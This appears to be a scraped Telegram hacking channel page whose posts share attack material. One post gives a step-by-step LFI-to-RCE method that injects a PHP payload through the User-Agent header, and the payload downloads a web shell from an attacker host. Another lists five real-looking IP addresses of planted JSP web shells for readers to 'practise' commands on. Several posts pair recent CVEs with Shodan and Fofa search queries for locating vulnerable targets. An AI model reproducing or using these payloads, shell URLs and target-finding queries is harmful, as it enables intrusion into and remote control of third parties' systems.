HackTheBox Academy
Closed channel
🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1
Show more3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
3 327
↔️ Due to the banning of hacking and security channels by the Telegram team, we decided to make the backup channel available for friends.
🌟 Please Join.
👉 @HackTheBox_Academy
3 327
Repost from GitHub BOX
New #HACKING repository:
Title: AllAboutBugBounty
Link: https://github.com/daffainfo/AllAboutBugBounty
3 327
🩸🩸🫵🩸🩸🩸 💥
🕷 Hands-On Web App Pentesting.
#Course #Pentest #Owasp
#Hacking #Ethical_Hacker #Security
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security
3 327
#LFI To #RCE.
1. Find A Target That Vulnerable To LFI
2. Test For Reading File (/etc/passwd)
3. If The 2nd Item Was Succes, Test for Another File Named environ
/proc/self/environ4. In Some Case Its Available, In Some Cases is NOT. 5. If The File Was Available you should See The File Like This That Contain User-Agent.
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 806. Now let's inject our malicious code in proc/self/environ With User-Agent HTTP Header. 7. Start BurpSuite And Capture The Request. 8. Modify User-Agent With PHP Shell Code. or You Can Use This
<?system('wget http://Attacker/Shells/gny.txt -O shell.php');?>
9. Access Your Shell.
10. www.Target.com/shell.php.
#Ethical_Hacker #LFI #RCE
#Pentest #Vulnerability #Web
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
👩💻 Practice Time For #Ethical_Hacker.
👩💻 Usage:
H3X.jsp?cmd=whoami
1. http://1.94.60.178:8080/H3X.jsp
2. http://124.71.181.212:8082/H3X.jsp
3. http://182.254.228.206:8080/H3X.jsp
4. http://1.94.228.219:8080/H3X.jsp
5. http://1.94.26.65:8080/H3X.jsp3 327
🔶️ دوستان هرکس کانال 700 + داره میتواند در تبادل لیستی ما شرکت کند حتما با ما در ارتباط باشد :
@Unique_exploitbot
3 327
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox
📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial
💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial
💠 منابع BlueTeam :
⭕️ @BlueTeamKit
💠 ابزارها و دوره های OSINT
⭕️ @OsintGit
💠 برگزاری دوره های امنیت سایبری
⭕️ @kasraone_com
💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕️ @RedTeamVillageRTV
💠 منابع CTF و رایت آپ ها و دوره های HackTheBox :
⭕️ @PfkCTF
💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s
💠 دوره های آموزشی - CVE-Exploit
⭕️ @HackTheBox_Academy
💠 برای اضافه شدن در لیست تبادلات پیام دهید :
🤖 @Unique_exploitbot
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
3 327
↔️ CVE-2024-9047
❗️ The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php.
🖥 Exploit - POC
🔎 Fofa:
body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"
#Ethical_Hacker #Exploit #WordPress
#CVE #Pentest #Vulnerability #Web
➖➖➖➖➖➖➖➖➖
🌐 @HackTheBox_Academy
🌐 @HackTheBox_Security3 327
↔️ CVE-2024-50603
❗️ Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud.
🖥 NucleiTemplate - POC
🔎 SHODAN:
title="Aviatrix Controller"🔎 Fofa:
product="aVIaTrIX-Controller"🔎 Hunter:
product.name="Aviatrix Controller"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-6782
❗️ Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution.
🖥 Exploit - POC
⚔️ Nuclei-Template
🔎 SHODAN:
html:"Calibre"🔎Fofa:
server="Calibre"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
💠 تست نفوذ را رایگان یاد بگیر .
⭕️ @TryHackBox
📖 کتاب ها و منابع Cyber Security
📚 @LibrarySecOfficial
💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ...
⭕️ @TryHackBoxOfficial
💠 منابع BlueTeam :
⭕️ @BlueTeamKit
💠 ابزارها و دوره های OSINT
⭕️ @OsintGit
💠 برگزاری دوره های امنیت سایبری
⭕ @kasraone_com
💠 تمامی منابع Red Team اینجاست!
💠 آموزش توسعه بدافزار (رایگان)
⭕ @RedTeamVillageRTV
💠 منابع CTF و رایت آپ ها و دوره های HackTheBox :
⭕ @PfkCTF
💠 آموزش وبهکینگ و باگ بانتی
⭕ @EroHack0
💠پنتست وب رو یاد بگیر
⭕️ @GitBook_s
💠 دوره های آموزشی - CVE-Exploit
⭕ @HackTheBox_Academy
💠 برای اضافه شدن در لیست پیام دهید :
🤖 @Unique_exploitbot
⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️
3 327
↔️ CVE-2024-49112
❗️ Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability.
🖥 Exploit - POC
🔎 HUNTER:
protocol=="ldaps" or protocol=="ldap"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-1212
❗️ Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.
🖥 Exploit - POC
⚔️ Nuclei-Template
🔎 SHODAN:
html:"LoadMaster"🔎Fofa:
"LoadMaster" || app="KEMP-Login-Screen"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
3 327
↔️ CVE-2024-12987
❗️ The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely.
👩💻 Exploit - POC
🔎Fofa:
app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security
